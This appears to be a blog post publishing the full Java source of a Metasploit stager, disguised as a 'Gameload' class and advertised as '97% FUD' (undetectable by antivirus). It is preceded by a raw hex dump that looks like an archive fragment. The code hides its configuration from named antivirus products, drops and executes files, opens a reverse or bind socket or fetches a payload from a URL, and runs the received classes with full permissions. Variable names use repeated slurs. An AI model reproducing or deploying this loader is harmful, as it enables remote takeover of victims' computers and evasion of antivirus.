5A 59 9E D9 9D 9D 39 E7 CC EC DE 7E BF FE 8A 1C 5E 61 D3 C1 94 C0 7A 98 1C F9 29 F5 E9 4B 24 BB FE F0 0D F9 ED E3 48 66 83 9D 28 C9 68 3F 3E 54 71 2F 39 75 90 17 98 1D CA 91 F4 23 19 F7 FD FD EE 90 42 ED A0 28 B0 62 A3 F2 54 FB 34 A2 58 FB EF 0F 0F 3E 98 45 A0 32 4D 31 A5 02 C5 B7 2A 56 FA 9D 40 AE D1 EC 08 E4 77 92 1E B9 AC E0 81 07 07 D3 02 E5 40 C5 F4 F9 E4 A8 4B E9 81 EC 46 24 50 0D 92 50 46 1D 99 2A B3 9F 04 F3 7A A0 32 81 8D E0 7F 04 B7 18 D6 EA D9 55 D9 B1 D4 E1 80 7A 02 B5 46 F0 4B EC 4F 99 AD 66 C7 C5 1C 16 1C CC 0B 54 FE 3A F6 50 C3 A2 40 A1 4F 7A 6F D7 76 B0 E7 E2 11 9E 38 78 2C B0 7C 8F 92 76 98 12 C5 1E 9E 62 99 65 70 E9 9F 61 81 7A A3 79 5F 0F E3 94 96 A1 58 F1 B0 6A A6 53 08 4D 5F 4C 4D 23 2D 30 77 47 07 3C E1 CC 56 F3 65 FC 03 58 C0 6D 27 27 69 48 1F 95 19 E9 D2 1D 93 7B 6D 08 50 07 33 F2 5F 00 30 C5 9E 2F 8A ED 0C EF 7C F6 82 7D E1 E5 25 DC 73 7B EC B1 2D DA E0 0C 1E B2 F5 C6 09 28 A1 CC 9E 1F 0E 2A 93 62 E2 EC 1C FB C5 AD 0B 54 2B B8 39 43 F9 0A 4B 9F B6 BF C1 D9 BE C0 B3 DF 70 35 CB EC C1 65 C0 12 7F 55 86 AA B1 35 F0 AB 63 88 09 BC 59 D5 B1 C6 04 25 D6 F8 1C EB 56 EF 0B 8B B4 F1 03 50 4B 01 02 14 00 14 00 00 00 08 00 EB 05 41 42 8B A8 25 AA B7 00 00 00 2D 01 00








I know if i want  it 100 % FUD i got it fud but atm i dont have fun to Spend too much time on it.



97 % FUD i think its ok Zwinkerndes Smiley



And here the Java Source Code of the New 97% FUD Java Metasploit Stager.



Gameload.java




/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/
package sploit;

import java.io.*;
import java.lang.reflect.Method;
import java.net.*;
import java.security.*;
import java.security.cert.Certificate;
import java.util.*;

@SuppressWarnings("unused")
public class Gameload extends ClassLoader
{

public Gameload()
{
/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

}

public static void main(String[] args) {
// TODO Auto-generated method stub
try {
crashyyy(null);
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}

@SuppressWarnings("resource")
public static void crashyyy(String args[])
throws Exception
{
Properties properties = new Properties();

@SuppressWarnings("rawtypes")
Class play1 = sploit.Gameload.class;

String s = play1.getName().replace('.', '/') + ".class";

InputStream inputstream = play1.getResourceAsStream("/SecurityisjustanIllusion.dat"); // Fuck Avast GData Sophos ;) Just Pattern a .dat file lamers

if(inputstream != null)
{
properties.load(inputstream);

inputstream.close();
}

String zero1 = properties.getProperty("Execute");

if(zero1 != null)

{
File gayfile = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");

gayfile.delete();

File gayfile1 = new File(gayfile.getAbsolutePath() + ".dir");

gayfile1.mkdir();

File gayfile2 = new File(gayfile1, zero1);

writeEmbeddedFile(play1, zero1, gayfile2);

properties.remove("Execute");

properties.put("Dr0ppExecutable", gayfile2.getCanonicalPath());

}
int i = Integer.parseInt(properties.getProperty("0Gay", "0"));

String zero2 = properties.getProperty("Dr0pExecutable");

if(i > 0)
{
properties.setProperty("0Gay", String.valueOf(i - 1));

File gayfile3 = File.createTempFile("~0Gay", ".SecurityisjustanIllusion");

gayfile3.delete();
File gayfile5 = new File(gayfile3.getAbsolutePath() + ".dir");

File gayfile6 = new File(gayfile5, "SecurityisjustanIllusion.dat");

File gayfile7 = new File(gayfile5, s);

gayfile7.getParentFile().mkdirs();

writeEmbeddedFile(play1, s, gayfile7);

if(properties.getProperty("URL", "").startsWith("https:"))

writeEmbeddedFile(play1, "Gamesploit/GameloadTrust0Manager.class", new File(gayfile7.getParentFile(), "Gameload0TrustManager.class"));

if(properties.getProperty("AESPassword", null) != null)

writeEmbeddedFile(play1, "Gamesploit/AESEncryption.class", new File(gayfile7.getParentFile(), "AESEncryption.class"));

FileOutputStream fileoutputstream = new FileOutputStream(gayfile6);

properties.store(fileoutputstream, "");

fileoutputstream.close();

Process process = Runtime.getRuntime().exec(new String[] {

getJreExecutable("java"), "-classpath", gayfile5.getAbsolutePath(), play1.getName()

});
process.getInputStream().close();

process.getErrorStream().close();

Thread.sleep(2000L);

File afile[] = {

gayfile7, gayfile7.getParentFile(), gayfile6, gayfile5

};
for(int k = 0; k < afile.length; k++)
{
for(int l = 0; l < 10 && !afile[k].delete(); l++)
{
afile[k].deleteOnExit();

Thread.sleep(100L);
}

}

} else
if(zero2 != null)
{
File gayfile4 = new File(zero2);
if(!IS_WIN)
try
{
try
{
(java.io.File.class).getMethod("setExecutable", new Class[] {

Boolean.TYPE

}).invoke(gayfile4, new Object[] {

Boolean.TRUE
});
}
catch(NoSuchMethodException nosuchmethodexception)
{
Runtime.getRuntime().exec(new String[] {
"chmod", "+x", zero2
}).waitFor();
}
}
catch(Exception exception)
{
exception.printStackTrace();
}
Runtime.getRuntime().exec(new String[] {
zero2
});
if(!IS_WIN)
{
gayfile4.delete();
gayfile4.getParentFile().delete();
}
} else
{
int j = Integer.parseInt(properties.getProperty("LPORT", "31337"));

String zero3 = properties.getProperty("LHOST", null);

String zero4 = properties.getProperty("URL", null);

Object zeroobj;
Object zeroobj1;
if(j <= 0)
{
zeroobj = System.in;

zeroobj1 = System.out;

} else
if(zero4 != null)
{
if(zero4.startsWith("raw:"))

zeroobj = new ByteArrayInputStream(zero4.substring(4).getBytes("ISO-8859-1"));
else

if(zero4.startsWith("https:"))

{
URLConnection urlconnection = (new URL(zero4)).openConnection();

Class.forName("Gamesploit.GameloadTrustManager").getMethod("useFor", new Class[] {
java.net.URLConnection.class
}).invoke(null, new Object[] {
urlconnection
});
zeroobj = urlconnection.getInputStream();
} else
{
zeroobj = (new URL(zero4)).openStream();
}
zeroobj1 = new ByteArrayOutputStream();
} else
{
Socket socket;
if(zero3 != null)
{
socket = new Socket(zero3, j);
} else
{
ServerSocket gaysocket = new ServerSocket(j);
socket = gaysocket.accept();
gaysocket.close();
}
zeroobj = socket.getInputStream();
zeroobj1 = socket.getOutputStream();
}
String zero5 = properties.getProperty("AESPassword", null);
if(zero5 != null)
{
Object aobj[] = (Object[])Class.forName("Gamesploit.AESEncryption").getMethod("wrapStreams", new Class[] {
java.io.InputStream.class, java.io.OutputStream.class, java.lang.String.class
}).invoke(null, new Object[] {
zeroobj, zeroobj1, zero5
});
zeroobj = (InputStream)aobj[0];
zeroobj1 = (OutputStream)aobj[1];
}
StringTokenizer stringtokenizer = new StringTokenizer("Gaylo0ad -- " + properties.getProperty("Para", ""), " ");
String args1[] = new String[stringtokenizer.countTokens()];
for(int i1 = 0; i1 < args1.length; i1++)
args1[i1] = stringtokenizer.nextToken();

(new Gameload()).bootstrap(((InputStream) (zeroobj)), ((OutputStream) (zeroobj1)), properties.getProperty("Emage", null), args1);
}
}

private static void writeEmbeddedFile(@SuppressWarnings("rawtypes") Class play1, String s, File file)
throws FileNotFoundException, IOException
{
InputStream inputstream = play1.getResourceAsStream("/" + s);
FileOutputStream fileoutputstream = new FileOutputStream(file);
byte abyte0[] = new byte[4096];
int i;
while((i = inputstream.read(abyte0)) != -1)
fileoutputstream.write(abyte0, 0, i);
fileoutputstream.close();
}

@SuppressWarnings("unchecked")
private final void bootstrap(InputStream inputstream, OutputStream outputstream, String s, String as[])
throws Exception
{
try
{
DataInputStream datainputstream = new DataInputStream(inputstream);
Permissions permissions = new Permissions();
permissions.add(new AllPermission());
ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
@SuppressWarnings("rawtypes")
Class play1;
if(s == null)
{
int i = datainputstream.readInt();
do
{
byte abyte0[] = new byte[i];
datainputstream.readFully(abyte0);
resolveClass(play1 = defineClass(null, abyte0, 0, i, protectiondomain));
i = datainputstream.readInt();
} while(i > 0);
} else
{
play1 = Class.forName("gameload.woot." + s);
}
Object obj = play1.newInstance();
play1.getMethod("start", new Class[] {
java.io.DataInputStream.class, java.io.OutputStream.class, java.lang.String[].class
}).invoke(obj, new Object[] {
datainputstream, outputstream, as
});
}
catch(Throwable throwable)
{
throwable.printStackTrace(new PrintStream(outputstream));
}
}

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/


private static String getJreExecutable(String s)
{
File file = null;
if(IS_GAME)
file = findInDir(GAY_HOME + "/sh", s);
if(file == null)
file = findInDir(GAY_HOME + "/bin", s);
if(file != null)
return file.getAbsolutePath();
else
return addExtension(s);
}

private static String addExtension(String s)
{
return s + (IS_WIN ? ".exe" : "");
}

private static File findInDir(String s, String s1)
{
File gayfile = normalize(s);
File gayfile1 = null;
if(gayfile.exists())
{
gayfile1 = new File(gayfile, addExtension(s1));
if(!gayfile1.exists())
gayfile1 = null;
}
return gayfile1;
}

@SuppressWarnings("unchecked")
private static File normalize(String s)
{
@SuppressWarnings("rawtypes")
Stack gay = new Stack();
String as[] = dissect(s);
gay.push(as[0]);
StringTokenizer stringtokenizer = new StringTokenizer(as[1], File.separator);
do
{
if(!stringtokenizer.hasMoreTokens())
break;
String zero1 = stringtokenizer.nextToken();
if(!".".equals(zero1))
if("..".equals(zero1))
{
if(gay.size() < 2)
return new File(s);
gay.pop();
} else
{
gay.push(zero1);
}
} while(true);
StringBuffer gaybuffer = new StringBuffer();
for(int i = 0; i < gay.size(); i++)
{
if(i > 1)
gaybuffer.append(File.separatorChar);
gaybuffer.append(gay.elementAt(i));
}

return new File(gaybuffer.toString());
}

private static String[] dissect(String s)
{
char c = File.separatorChar;
s = s.replace('/', c).replace('\\', c);
String zero1 = null;
int i = s.indexOf(':');
if(i > 0 && IS_WIN)
{
int j = i + 1;
zero1 = s.substring(0, j);
char ac[] = s.toCharArray();
zero1 = zero1 + c;
j = ac[j] != c ? j : j + 1;
StringBuffer stringbuffer = new StringBuffer();
for(int l = j; l < ac.length; l++)
if(ac[l] != c || ac[l - 1] != c)
stringbuffer.append(ac[l]);

s = stringbuffer.toString();
} else
if(s.length() > 1 && s.charAt(1) == c)
{
int k = s.indexOf(c, 2);
k = s.indexOf(c, k + 1);
zero1 = k <= 2 ? s : s.substring(0, k + 1);
s = s.substring(zero1.length());
} else
{
zero1 = File.separator;
s = s.substring(1);
}
return (new String[] {
zero1, s
});
}

private static final String GAME_NAME;
private static final String PATH_SEP = System.getProperty("path.separator");
private static final boolean IS_GAME;
private static final boolean IS_WIN = PATH_SEP.equals(";");
private static final String GAY_HOME = System.getProperty("java.home");

static
{
GAME_NAME = System.getProperty("os.name").toLowerCase(Locale.ENGLISH);
IS_GAME = "gam".equals(GAME_NAME);
}
}


/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/

/*
* Welcome to Java MetaSploit-Stager by http://security-is-just-an-illusion.blogspot.de/
* 01.02.2013
* by Crashyyyy
* 97 % FUD
*/


Have pfun ….



Use it for Personal use or study purposes.

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template